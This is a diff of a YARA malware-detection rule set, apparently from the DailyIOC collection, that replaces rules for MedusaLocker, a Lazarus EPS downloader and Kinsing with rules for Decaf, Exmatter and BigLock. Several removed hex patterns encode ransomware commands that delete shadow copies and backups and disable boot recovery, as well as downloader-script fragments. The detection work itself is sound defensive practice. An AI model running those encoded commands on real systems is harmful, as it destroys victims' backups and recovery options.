-		$s2 = { 44 89 6c 24 38 4c 89 6c 24 30 c7 44 24 28 03 00 00 00 c7 44 24 20 03 00 00 00 45 33 c9 45 33 c0 41 8d 51 0a 48 8b 4d c7 ff 15 f6 42 01 00 85 c0 0f 88 bb 01 00 00 48 8d 0d 1d fa 01 00 ff 15 c1 42 01 00 4c 8b f8 48 8d 0d 1b fa 01 00 ff 15 b1 42 01 00 4c 8b e0 4c 89 6d df 48 8b 4d c7 48 8b 11 4c 8b 52 30 4c 89 6c 24 28 48 8d 45 df 48 89 44 24 20 45 33 c9 45 33 c0 49 8b d4 41 ff d2 4c 89 6d e7 48 8b 4d df 48 8b 01 4c 89 6c 24 20 4c 8d 4d e7 45 33 c0 49 8b d7 ff 90 98 00 00 00 4c 89 6d cf 48 8b 4d e7 48 8b 01 4c 8d 45 cf 33 d2 ff 50 78 b8 08 00 00 00 66 89 45 ef 8d 48 10 e8 dc 02 00 00 48 8b d8 48 89 45 a7 48 85 c0 74 33 0f 57 c0 33 c0 0f 11 03 48 89 43 10 4c 89 6b 08 c7 43 10 01 00 00 00 48 8b ce ff 15 14 42 01 00 48 89 03 48 85 c0 75 0e 48 85 }
-		$s3 = { 4c 8d 05 75 0e 02 00 0f 1f 40 00 66 0f 1f 84 00 00 00 00 00 0f b6 d0 42 0f b6 0c 12 66 41 31 08 74 12 ff c0 49 83 c0 02 83 f8 20 72 e7 0f 1f 80 00 00 00 00 0f b7 05 49 09 02 00 48 8d 0d 76 09 02 00 66 d1 e8 66 83 e0 7f 66 0f 6f 15 f3 d4 01 00 66 89 05 2c 09 02 00 0f b7 05 27 09 02 00 66 d1 e8 66 83 e0 7f 66 89 05 19 09 02 00 0f b7 05 14 09 02 00 66 d1 e8 66 83 e0 7f 66 89 05 06 09 02 00 0f b7 05 01 09 02 00 66 d1 e8 66 83 e0 7f 66 89 05 f3 08 02 00 0f b7 05 ee 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 e0 08 02 00 0f b7 05 db 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 cd 08 02 00 0f b7 05 c8 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 ba 08 02 00 0f b7 05 b5 08 02 00 66 d1 e8 66 83 e0 7f f3 0f 6f 05 bc 08 02 00 66 89 05 9f 08 02 00 0f b7 05 9a 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 8c 08 02 00 0f b7 05 87 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 79 08 02 00 0f b7 05 74 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 66 08 02 00 0f b7 05 61 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 53 08 02 00 0f b7 05 4e 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 40 08 02 00 0f b7 05 3b 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 2d 08 02 00 0f b7 05 28 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 1a 08 02 00 0f b7 05 15 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 07 08 02 00 0f b7 05 02 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 f4 07 02 00 0f b7 05 ef 07 02 00 66 d1 e8 66 83 e0 7f 66 89 05 e1 07 02 00 b8 01 00 00 00 66 0f 6e c8 8d 50 05 66 0f d1 c1 66 0f db c2 f3 0f 7f 05 c7 07 02 00 0f }
-		$s4 = { 48 89 9c 24 60 06 00 00 48 89 b4 24 68 06 00 00 48 89 bc 24 70 06 00 00 4c 89 b4 24 30 06 00 00 c7 05 2e 1a 02 00 04 00 00 00 48 c7 05 27 1a 02 00 01 00 00 00 4c 89 2d 2c 1a 02 00 ff 15 22 48 01 00 48 8d 35 8b 04 02 00 66 66 66 0f 1f 84 00 00 00 00 00 33 d2 44 89 6c 24 70 41 b8 08 03 00 00 48 8d 8d 10 02 00 00 45 8b f5 e8 e4 28 00 00 4c 8d 0d 5d 03 02 00 48 89 74 24 20 ba 84 01 00 00 48 8d 8d 10 02 00 00 49 c7 c0 ff ff ff ff e8 a0 fb ff ff 48 8d 54 24 70 48 8d 8d 10 02 00 00 e8 9f 05 00 00 8b d0 85 }
-		$s5 = { 4c 89 6c 24 60 4c 8d 05 25 cc 01 00 4c 89 6c 24 58 48 8d 15 e1 04 02 00 4c 89 6c 24 50 41 b9 ff 01 0f 00 4c 89 6c 24 48 48 8b cf 4c 89 6c 24 40 48 89 74 24 38 44 89 6c 24 30 c7 44 24 28 02 00 00 00 c7 44 24 20 10 00 00 00 ff 15 19 46 01 00 48 8b d8 ff 15 a8 46 01 00 8b f0 48 85 db 74 22 48 8b cb ff 15 20 46 01 00 48 8b cb ff 15 ff 45 01 00 48 8b cf ff 15 f6 45 01 00 bf 01 00 00 }
-		$s6 = { 33 d2 33 c9 41 b8 3f 00 0f 00 ff 15 f4 46 01 00 48 8b f8 48 85 }
+		$s1 = { 6a 16 58 0f be c8 88 85 b0 fe ff ff c7 85 d8 fe ff ff 42 73 7a 73 c7 85 dc fe ff ff 71 64 77 7b c7 85 e0 fe ff ff 38 73 6e 73 c6 85 e4 fe ff ff 00 e8 aa 73 ff ff 89 85 94 }
+		$s2 = "UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s" ascii
+		$s3 = { b8 c9 11 47 00 e8 c3 c5 01 00 68 f8 d7 47 00 33 db 53 53 ff 15 cc 20 47 00 53 50 89 85 d0 fc ff ff ff 15 d0 20 47 00 85 c0 0f 85 92 02 00 00 6a 01 ff 15 8c 22 47 00 84 c0 79 f4 53 e8 e2 aa 00 00 50 e8 1e 98 00 00 8b 35 84 22 47 00 8d 85 ec fe ff ff 59 59 50 53 53 6a 1c 53 ff d6 8d 8d ec fe ff ff 8d 51 01 8a 01 41 84 c0 75 f9 2b ca 8d 85 ec fe ff ff 51 50 b9 f0 5b 48 00 e8 bf 0e 00 00 8d 85 e8 fd ff ff 50 68 04 01 00 00 ff 15 40 20 47 00 8d 8d e8 fd ff ff 8d 51 01 8a 01 41 84 c0 75 f9 2b ca 8d 85 e8 fd ff ff 51 50 b9 08 5c 48 00 e8 89 0e 00 00 8d 85 e4 fc ff ff 50 53 53 6a 1a 53 ff d6 8d 8d e4 fc ff ff 8d 51 01 8a 01 41 84 c0 75 f9 2b ca 8d 85 e4 fc ff ff 51 50 b9 90 5b 48 00 e8 57 0e 00 00 8b fb 89 9d dc fc ff ff 8b f3 89 bd d4 fc ff ff 89 b5 d8 fc ff ff 83 65 fc 00 33 c9 6a 16 5a 41 e8 71 05 ff ff 8b cf 89 85 e0 fc }
+		$s4 = { 6a 01 ff 15 98 22 47 00 85 c0 74 5d 6a 00 ff 15 a0 22 47 00 85 c0 74 51 56 6a 01 ff 15 94 22 47 00 8b f0 85 f6 74 3b 56 ff 15 38 21 47 00 8b d0 85 d2 74 27 8b ca 57 8d 79 01 8a 01 41 84 c0 75 f9 2b cf 6a 03 51 8b 0d 6c 72 48 00 52 ba 58 d7 47 00 e8 95 1b fe ff 83 c4 0c 5f 56 ff 15 64 21 47 00 }
+		$s5 = { 81 ec 14 02 00 00 a1 0c 50 48 00 33 c5 89 45 fc 53 56 8b d9 be 19 27 00 00 57 8b 7d 0c 83 fb ff 75 0c e8 bb eb ff ff 89 37 89 47 04 eb 17 ff 75 08 52 53 ff 15 bc 22 47 00 85 c0 8b cf 0f 95 c2 e8 b8 fe ff ff e8 98 eb ff ff 8b 4f 04 8b 49 04 3b 48 04 75 08 81 3f 34 27 00 00 74 20 e8 80 eb ff ff 8b 4f 04 8b 49 04 3b 48 04 0f 85 b9 00 00 00 81 3f 33 27 00 00 0f 85 ad 00 00 00 83 fb ff 75 0c e8 5b eb ff ff 89 37 e9 99 00 00 00 33 c0 89 9d f8 fd ff ff 40 89 9d fc fe ff ff 89 85 f4 fd ff ff 89 85 f8 fe ff ff 8d 85 f8 fe ff ff 6a 00 50 8d 85 f4 fd ff ff 50 6a 00 8d 43 01 50 ff 15 d8 22 47 00 8b f0 8b cf 85 f6 0f 98 c2 e8 2a fe ff ff 85 f6 78 53 83 a5 f0 fd ff ff 00 8d 85 ec fd ff ff 50 8d 85 f0 fd ff ff c7 85 ec fd ff ff 04 00 00 00 50 68 07 10 00 00 68 ff ff 00 00 53 ff 15 b0 22 47 00 8b f0 8b cf 85 f6 0f 95 c2 e8 e8 fd ff }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 80KB and 5 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 80KB and 4 of ( $s* )
 }
-rule ARKBIRD_SOLG_RAN_Medusalocker_July_2021_1 : FILE
+rule ARKBIRD_SOLG_RAN_Decaf_Nov_2021_1 : FILE
 {
 	meta:
-		description = "Detect MedusaLocker ransomware"
+		description = "Detect Decaf ransomware (unpacked UPX)"
 		author = "Arkbird_SOLG"
-		id = "7eec35ac-f1ec-596b-8224-ef27e31e841c"
-		date = "2021-07-25"
-		modified = "2021-08-08"
-		reference = "https://twitter.com/r3dbU7z/status/1418433910057353217"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-25/MedusaLocker/RAN_MedusaLocker_July_2021_1.yara#L1-L28"
+		id = "d19b2d31-a6c5-5033-ba43-4e9ccabc37bb"
+		date = "2021-11-01"
+		modified = "2021-11-02"
+		reference = "https://blog.morphisec.com/decaf-ransomware-a-new-golang-threat-makes-its-appearance"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-01/Decaf/RAN_Decaf_Nov_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "541665541c07b585a7dfa024f85516b7be94d7d8d76a85e58c8c3b71fd0550ff"
+		logic_hash = "5cea33d710d252b39bcd8ae227f52d10897b7fe58b1ff5226a1cb8cc094d600c"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		hash1 = "033b4950a8f249b20eb86ec6f8f2ea0a1567bb164289d1aa7fb0ba51f9bbe46c"
-		hash2 = "0abb4a302819cdca6c9f56893ca2b52856b55a0aa68a3cb8bdcd55dcc1fad9ad"
-		hash3 = "c2a0a317d73c96428ab088a8f0636ec4ccace7ca691c84ed66a83a70183f40dc"
-		hash4 = "f5fb7fa5231c18f0951c755c4cb0ec07b0889b5e320f42213cbf6bbbe499ad31"
+		hash1 = "088b4715bbe986deac972d551b88f178d43b191f5a71fbd4db3fb0810a233500"
+		hash2 = "5da2a2ebe9959e6ac21683a8950055309eb34544962c02ed564e0deaf83c9477"
 		tlp = "white"
-		adversary = "RaaS"
+		adversary = "-"
 
 	strings:
-		$s1 = { 76 00 73 00 73 00 61 00 64 00 6d 00 69 00 6e 00 2e 00 65 00 78 00 65 00 20 00 52 00 65 00 73 00 69 00 7a 00 65 00 20 00 53 00 68 00 61 00 64 00 6f 00 77 00 53 00 74 00 6f 00 72 00 61 00 67 00 65 00 20 00 2f 00 66 00 6f 00 72 00 3d 00 ?? 00 3a 00 20 00 2f 00 6f 00 6e 00 3d 00 ?? 00 3a 00 20 00 2f 00 6d 00 61 00 78 00 73 00 69 00 7a 00 65 00 3d }
-		$s2 = { 64 00 65 00 6c 00 20 00 2f 00 73 00 20 00 2f 00 66 00 20 00 2f 00 71 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 56 00 48 00 44 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 62 00 61 00 63 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 62 00 61 00 6b 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 77 00 62 00 63 00 61 00 74 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 62 00 6b 00 66 00 20 00 ?? 00 3a 00 5c 00 42 00 61 00 63 00 6b 00 75 00 70 00 2a 00 2e 00 2a 00 20 00 ?? 00 3a 00 5c 00 62 00 61 00 63 00 6b 00 75 00 70 00 2a 00 2e 00 2a 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 73 00 65 00 74 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 77 00 69 00 6e 00 20 00 ?? 00 3a 00 5c 00 2a 00 2e 00 64 00 73 00 6b }
-		$s3 = { 62 00 63 00 64 00 65 00 64 00 69 00 74 00 2e 00 65 00 78 00 65 00 20 00 2f 00 73 00 65 00 74 00 20 00 7b 00 64 00 65 00 66 00 61 00 75 00 6c 00 74 00 7d 00 20 00 62 00 6f 00 6f 00 74 00 73 00 74 00 61 00 74 00 75 00 73 00 70 00 6f 00 6c 00 69 00 63 00 79 00 20 00 69 00 67 00 6e 00 6f 00 72 00 65 00 61 00 6c 00 6c 00 66 00 61 00 69 00 6c 00 75 00 72 00 65 00 73 }
-		$s4 = { 42 67 49 41 41 41 43 6b 41 41 42 53 55 30 45 78 }
-		$s5 = "wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest" fullword wide
-		$s6 = { 62 00 63 00 64 00 65 00 64 00 69 00 74 00 2e 00 65 00 78 00 65 00 20 00 2f 00 73 00 65 00 74 00 20 00 7b 00 64 00 65 00 66 00 61 00 75 00 6c 00 74 00 7d 00 20 00 72 00 65 00 63 00 6f 00 76 00 65 00 72 00 79 00 65 00 6e 00 61 00 62 00 6c 00 65 00 64 00 20 00 4e 00 6f }
-		$s7 = { 76 00 73 00 73 00 61 00 64 00 6d 00 69 00 6e 00 2e 00 65 00 78 00 65 00 20 00 44 00 65 00 6c 00 65 00 74 00 65 00 20 00 53 00 68 00 61 00 64 00 6f 00 77 00 73 00 20 00 2f 00 41 00 6c 00 6c 00 20 00 2f 00 51 00 75 00 69 00 65 00 74 }
-		$s8 = { 77 00 6d 00 69 00 63 00 2e 00 65 00 78 00 65 00 20 00 53 00 48 00 41 00 44 00 4f 00 57 00 43 00 4f 00 50 00 59 00 20 00 2f 00 6e 00 6f 00 69 00 6e 00 74 00 65 00 72 00 61 00 63 00 74 00 69 00 76 00 65 }
-		$s9 = { 77 00 62 00 61 00 64 00 6d 00 69 00 6e 00 20 00 44 00 45 00 4c 00 45 00 54 00 45 00 20 00 53 00 59 00 53 00 54 00 45 00 4d 00 53 00 54 00 41 00 54 00 45 00 42 00 41 00 43 00 4b 00 55 00 50 }
-		$s10 = { 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 20 4c 49 53 54 20 4f 46 20 45 4e 43 52 59 50 54 45 44 20 46 49 4c 45 53 20 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 0d 0a }
-		$x1 = { 48 89 5c 24 08 57 48 83 ec 30 48 8b da 48 8b f9 e8 0b fe ff ff 44 8b 43 08 48 8d 47 28 44 2b 03 45 33 c9 48 8b 13 48 8b 4f 20 48 89 44 24 28 c7 44 24 20 00 00 00 00 ff 15 [2] 07 00 85 c0 74 12 c6 47 08 01 48 8b c7 48 8b 5c 24 40 48 83 c4 30 5f c3 ff 15 [2] 07 00 48 8b 5c 24 40 89 47 34 48 8b c7 }
+		$s1 = { 48 8b 05 [3] 00 48 8b 0d [3] 00 48 8d 54 24 ?? 8b 5c 24 ?? 48 8d 74 24 ?? 48 89 0c 24 48 89 44 24 08 48 89 54 24 10 48 89 5c 24 18 48 89 74 24 20 89 f8 48 89 44 24 28 48 c7 44 24 30 00 00 00 00 e8 [2] 00 00 45 0f 57 ff 65 4c 8b 34 25 28 00 00 00 4d 8b b6 00 00 00 00 48 83 7c 24 38 00 74 ?? 48 8b 54 24 ?? c6 82 e5 00 00 00 00 48 8b 54 24 ?? 31 c0 }
+		$s2 = { 48 8b 05 [3] 00 48 8b 0d [3] 00 48 89 0c 24 48 89 44 24 08 44 0f 11 7c 24 10 48 c7 44 24 20 00 00 00 00 e8 [2] 00 00 45 0f 57 ff 65 4c 8b 34 25 28 00 00 00 4d 8b b6 00 00 00 00 48 83 7c 24 28 00 74 0a 48 8b 6c 24 ?? 48 83 c4 ?? c3 e8 [3] 00 45 0f 57 ff 65 4c 8b 34 25 28 00 00 00 4d 8b b6 00 00 00 00 }
+		$s3 = { 48 83 ec 48 48 89 6c 24 40 48 8d 6c 24 40 48 89 44 24 50 48 89 5c 24 58 48 83 3d [3] 00 00 75 73 48 8b 05 45 [2] 00 48 8d 0d 66 [2] 00 48 89 04 24 48 89 4c 24 08 48 c7 44 24 10 04 01 00 00 e8 [2] 00 00 45 0f 57 ff 65 4c 8b 34 25 28 00 00 00 4d 8b b6 00 00 00 00 48 8b 44 24 18 48 85 c0 0f 84 6a 01 00 00 48 3d 04 01 00 00 0f 87 5e 01 00 00 48 8d 1d 1a [2] 00 c6 04 03 5c 4c 8d 40 01 4c 89 05 [3] 00 48 8b 44 24 50 48 8b 5c }
+		$s4 = { 48 89 44 24 40 c7 44 24 3c 00 00 00 00 48 8b 0d [3] 00 48 8d 54 24 3c 48 89 0c 24 48 89 44 24 08 48 89 54 24 10 e8 [2] 00 00 45 0f 57 ff 65 4c 8b 34 25 28 00 00 00 4d 8b b6 00 00 00 00 48 83 7c 24 18 00 75 10 48 8b 44 24 40 8b 4c 24 68 48 8b 5c 24 60 eb 1d 48 8b 44 24 40 48 8b 5c 24 60 8b 4c 24 68 e8 8f 00 00 00 48 8b 6c 24 48 48 83 c4 50 c3 c7 44 24 38 00 00 00 00 48 8b 15 [3] 00 48 8d 74 24 38 48 89 14 24 48 89 44 24 08 48 89 5c 24 10 48 63 c1 48 89 44 24 18 48 89 74 24 20 48 c7 44 24 28 00 00 00 00 e8 }
+		$s5 = { 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 49 42 43 67 4b 43 41 51 45 41 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 150KB and 9 of ( $s* ) and $x1
+		uint16( 0 ) == 0x5a4d and filesize > 400KB and 4 of them
 }
-rule ARKBIRD_SOLG_APT_Lazarus_EPS_July_2020_1 : FILE
+rule ARKBIRD_SOLG_EXF_Exmatter_Nov_2021_1 : FILE
 {
 	meta:
-		description = " Detected Lazarus EPS script for download and execute the payload in base 64"
+		description = "Detect packed Exmatter with Confuser"
 		author = "Arkbird_SOLG"
-		id = "244ef018-bc7b-5e10-bf65-b52fdb5ad403"
-		date = "2020-07-28"
-		modified = "2020-07-28"
-		reference = "https://twitter.com/spider_girl22/status/1287952503280082944"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-07-28/Lazarus/APT_Lazarus_EPS_July_2020_1.yar#L3-L30"
+		id = "ddae7776-3202-50e6-b8af-0e5d15373386"
+		date = "2021-11-01"
+		modified = "2021-11-01"
+		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackmatter-data-exfiltration"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-01/Exmatter/EXF_Exmatter_Nov_2021_1.yara#L1-L22"
 		license_url = "N/A"
-		logic_hash = "0fbd6ac10a31cc9a571e42f8696480336cd350e56ba2ffafb386f066fd53c552"
-		score = 75
-		quality = 45
+		logic_hash = "67aaac3db488a9e28897047a7498b7a447ec63cdb6da82cb3d4217c7d615f176"
+		score = 50
+		quality = 75
 		tags = "FILE"
-		hash1 = "152c620980f0fc20a6eade0f5b726b98fc28392d84ce386a5fc1b0877ef446d7"
+		hash1 = "b6bc126526e27c98a94aab16989864161db1b3a75f18bd5c72bacbdfccad7bd7"
+		hash2 = "8eded48c166f50be5ac33be4b010b09f911ffc155a3ab76821e4febd369d17ef"
+		hash3 = "325ecd90ce19dd8d184ffe7dfb01b0dd02a77e9eabcb587f3738bcfbd3f832a1"
+		level = "Experimental"
+		tlp = "white"
+		adversary = "RaaS"
 
 	strings:
-		$s1 = { 63 64 20 2F 64 20 22 25 61 70 70 64 61 74 61 25 5C 4D 69 63 72 6F 73 6F 66 74 5C 49 6E 74 65 72 6E 65 74 20 45 78 70 6C 6F 72 65 72 22 }
-		$s2 = { 46 75 6E 63 74 69 6F 6E 20 42 61 73 65 36 34 44 65 63 6F 64 65 28 42 79 56 61 6C 20 76 43 6F 64 65 29 }
-		$s3 = { 43 72 65 61 74 65 4F 62 6A 65 63 74 28 22 4D 73 78 6D 6C 32 2E 44 4F 4D 44 6F 63 75 6D 65 6E 74 2E 33 2E 30 22 29 }
-		$s4 = { 46 75 6E 63 74 69 6F 6E 20 42 69 6E 61 72 79 54 6F 53 74 72 69 6E 67 28 42 69 6E 61 72 79 29 }
-		$s5 = { 43 72 65 61 74 65 4F 62 6A 65 63 74 28 22 41 44 4F 44 42 2E 53 74 72 65 61 6D 22 29 }
-		$s6 = { 43 72 65 61 74 65 4F 62 6A 65 63 74 28 22 57 53 63 72 69 70 74 2E 53 68 65 6C 6C 22 29 }
-		$s7 = { 63 72 65 61 74 65 6F 62 6A 65 63 74 28 22 4D 69 63 72 6F 73 6F 66 74 2E 58 4D 4C 48 54 54 50 22 29 }
-		$s8 = { 2E 45 6E 76 69 72 6F 6E 6D 65 6E 74 28 22 50 52 4F 43 45 53 53 22 29 28 22 50 72 6F 67 72 61 6D 57 36 34 33 32 22 29 20 3D 20 22 22 }
-		$s9 = { 3A 43 72 65 61 74 65 4F 62 6A 65 63 74 28 22 53 63 72 69 70 74 69 6E 67 2E 46 69 6C 65 53 79 73 74 65 6D 4F 62 6A 65 63 74 22 29 2E 44 65 6C 65 74 65 66 46 69 6C 65 20 57 73 63 72 69 70 74 2E 53 63 72 69 70 74 46 75 6C 6C 4E 61 6D 65 2C 20 54 72 75 65 3E 22 }
-		$s10 = { 20 65 63 68 6F 20 73 74 61 72 74 20 2F 42 20 2F 6D 69 6E 20 63 73 63 72 69 70 74 2E 65 78 65 }
-		$s11 = { 22 5E 26 64 65 6C 20 22 25 7E 66 30 22 3E }
-		$s12 = { 2E 52 75 6E 20 22 72 65 67 73 76 72 33 32 2E 65 78 65 20 2F 73 20 }
-		$s13 = { 2E 54 79 70 65 20 3D 20 31 3A 2E 4F 70 65 6E 3A 2E 57 72 69 74 65 20 42 69 6E 61 72 79 3A 2E 50 6F 73 69 74 69 6F 6E 20 3D 20 30 3A 2E 54 79 70 65 20 3D 20 32 3A 2E 43 68 61 72 53 65 74 20 3D 20 22 75 73 2D 61 73 63 69 69 22 }
-		$s14 = { 2E 4F 70 65 6E 20 22 47 45 54 22 2C 20 }
-		$s15 = { 73 74 61 72 74 20 2F 42 20 2F 6D 69 6E 20 }
-		$URL1 = { 22 68 74 74 70 3A 2F 2F 74 ?? ?? ?? }
-		$URL2 = { 22 68 74 74 70 73 3A 2F 2F 74 ?? ?? ?? }
+		$s1 = { 45 38 42 44 32 35 45 33 46 35 33 34 39 39 41 43 31 39 42 44 42 34 31 45 37 36 45 38 36 38 39 37 38 39 31 31 42 43 35 41 44 46 37 36 34 33 31 38 33 45 34 38 36 33 38 32 42 44 33 42 42 44 30 30 00 35 41 41 34 30 37 35 37 33 42 34 43 36 45 43 43 41 45 35 36 44 30 46 35 43 34 33 35 34 36 32 33 39 38 43 30 41 46 42 35 33 46 36 44 36 32 33 31 44 38 39 34 44 34 44 31 41 37 46 44 36 45 30 30 00 42 33 39 46 43 34 39 41 36 31 35 36 45 37 31 35 45 38 42 39 37 41 35 30 46 44 34 35 46 45 34 36 38 37 30 37 38 44 42 44 31 45 45 43 46 46 44 39 46 38 35 31 34 30 42 35 33 31 36 45 39 32 31 30 00 44 33 30 39 45 32 43 32 30 31 43 37 35 43 43 30 38 43 35 33 36 42 41 34 30 32 31 45 41 35 37 43 45 42 34 44 30 34 34 39 32 36 30 31 36 46 46 39 39 46 45 44 45 36 31 35 34 36 31 30 41 32 31 30 00 36 43 37 35 38 36 33 43 32 46 39 38 44 37 46 41 45 33 36 45 37 44 46 43 45 38 46 31 39 45 43 39 35 41 46 30 30 43 43 42 33 44 43 39 39 39 31 38 46 42 38 43 30 42 35 38 39 42 30 42 34 35 31 30 }
+		$s2 = { 33 44 33 32 31 41 45 42 34 33 39 35 36 30 34 38 46 35 43 37 35 41 38 42 38 36 36 35 32 34 33 34 44 31 33 31 30 31 31 32 45 37 44 36 42 37 38 46 42 37 35 44 39 33 35 36 31 44 31 31 30 39 38 31 00 34 39 44 38 32 36 38 33 30 42 35 44 39 32 30 34 34 38 46 37 34 42 42 42 45 44 42 33 36 31 46 31 37 43 39 44 44 34 36 31 45 30 44 43 33 44 45 44 31 31 34 45 36 45 31 33 45 30 31 37 33 39 38 31 00 31 45 42 30 38 30 36 38 33 30 39 37 41 32 37 46 42 37 34 33 46 36 32 44 30 38 33 38 44 34 42 41 36 34 33 35 46 44 43 33 38 38 32 41 36 41 36 37 45 46 42 43 32 32 34 45 37 31 42 44 42 43 38 31 00 46 39 45 39 31 44 44 39 44 32 36 32 38 43 43 32 39 32 42 41 43 32 36 35 39 41 35 35 34 34 42 38 42 46 42 30 41 44 31 46 38 31 30 30 43 37 35 45 38 32 44 44 33 42 32 43 45 44 30 35 43 37 39 31 00 45 44 44 31 45 32 34 31 37 36 33 46 34 33 33 35 30 38 37 42 39 38 41 44 30 37 35 38 44 36 39 33 31 39 32 42 37 37 45 44 37 32 41 39 36 43 38 42 33 35 41 45 31 39 34 41 45 38 45 39 31 41 39 31 00 38 43 46 31 34 42 43 33 42 46 39 44 36 31 30 30 43 41 38 41 }
+		$s3 = "SSH_MSG_NEWKEYS" ascii
+		$s4 = { 35 45 46 32 31 35 39 31 38 33 32 30 41 44 38 41 46 41 41 30 32 35 33 35 35 34 36 46 34 34 33 43 38 44 30 39 46 30 41 44 35 31 33 37 45 35 32 30 33 34 32 38 38 43 37 36 39 41 43 36 42 41 44 46 00 44 36 32 45 45 38 34 39 37 41 45 34 39 35 41 33 31 31 34 35 41 37 37 41 35 43 39 44 35 35 37 30 34 43 30 38 38 33 42 30 31 35 46 45 31 41 45 39 46 44 46 46 45 32 30 38 46 31 33 46 41 45 44 46 00 31 35 32 30 33 33 46 38 33 46 37 46 41 36 36 34 35 31 39 33 42 33 32 32 43 43 42 31 36 37 32 46 30 38 39 35 36 42 36 38 43 33 38 44 31 33 32 46 32 32 37 38 46 43 46 30 46 41 30 34 44 46 45 46 00 33 41 33 36 41 46 34 41 46 30 41 31 46 45 35 37 39 35 44 42 39 39 46 41 38 44 33 39 34 46 41 32 44 38 39 30 41 32 32 35 32 38 30 41 38 41 31 35 39 41 43 37 39 46 31 45 34 38 45 45 31 38 46 46 00 44 43 37 42 45 38 33 42 33 45 46 46 38 31 45 38 43 39 45 30 36 46 37 44 37 43 31 46 34 42 44 37 33 34 46 32 30 32 30 41 34 32 34 32 39 45 32 32 41 32 36 31 42 30 45 45 45 31 36 44 31 39 46 46 }
+		$s5 = { 39 38 41 43 30 38 30 44 38 38 37 45 31 34 43 43 39 32 32 44 34 35 37 43 33 42 31 30 35 35 37 31 45 33 36 41 37 35 43 43 39 31 31 42 33 35 46 36 30 43 32 46 35 30 36 44 44 44 45 43 35 43 41 46 00 31 33 46 33 37 31 33 43 30 38 42 33 30 43 45 34 37 36 35 37 33 45 43 31 38 32 39 30 31 32 35 30 45 39 36 42 34 37 37 35 33 31 39 46 34 36 41 38 41 30 30 41 34 46 31 45 42 38 41 43 35 32 42 46 00 43 39 38 39 33 42 41 33 46 43 31 46 41 39 41 37 43 38 37 33 42 32 37 38 37 41 41 41 44 38 38 39 45 33 38 46 30 43 33 39 36 39 45 37 41 32 37 42 30 44 33 37 45 30 41 }
+		$s6 = "SSH_MSG_KEX_DH_GEX_INIT" ascii
 
 	condition:
-		uint16( 0 ) == 0x33c9 and filesize < 3KB and ( 1 of ( $URL* ) ) and ( 12 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and filesize > 600KB and 5 of them
 }
-rule ARKBIRD_SOLG_Loader_JAVA_Kinsing_Aug_2020_Variant_A_1 : FILE
+rule ARKBIRD_SOLG_RAN_Biglock_Jun_2021_1 : FILE
 {
 	meta:
-		description = "Detect Kinsing Variant A"
+		description = "Detect BigLock ransomware"
 		author = "Arkbird_SOLG"
-		id = "470fd4a6-faba-52b5-8ffa-5ac33fb607a0"
-		date = "2020-08-28"
-		modified = "2020-08-29"
-		reference = "https://twitter.com/JAMESWT_MHT/status/1299222198574632961"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-28/Loader_JAVA_Kinsing_Aug_2020_1.yar#L2-L30"
+		id = "6a3fbb70-034d-5932-8c7f-de8d1b3df25c"
+		date = "2021-06-05"
+		modified = "2021-06-05"
+		reference = "https://twitter.com/fbgwls245/status/1400971422336311297"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-05/BigLock/RAN_BigLock_Jun_2021_1.yara#L1-L18"
 		license_url = "N/A"
-		logic_hash = "a9654b67ca6fb5de23d385707f01196d6d1c85e527d2bdbe312a2b2fcf998dc0"
-		score = 75
-		quality = 67
+		logic_hash = "f8407f39c4acef3546f8ddc22a04fb0534c5e1fa08d552654d9b9ebdf48fed94"
+		score = 50
+		quality = 75
 		tags = "FILE"
-		hash1 = "22063638b9f05870e14110ccab9e07d744204360b184cfec0075f9fd27e08488"
-		hash2 = "248dd35d069d6b106b7528e41f95cd8cef0140fbb60808aa51c99ac117cf3318"
-		hash3 = "6ec5b8ea86d0af908182d6afc63c85a817e0612dba6e5e4b126b5639ab048b16"
-		hash4 = "b82d9e0ea2b6139438ce0b805fb03c3ae89ada9d4fdd7722562e6075f706048c"
+		hash1 = "877c612cf42d85b943010437599b828383ecdf02a17e2b017367db34637e5463"
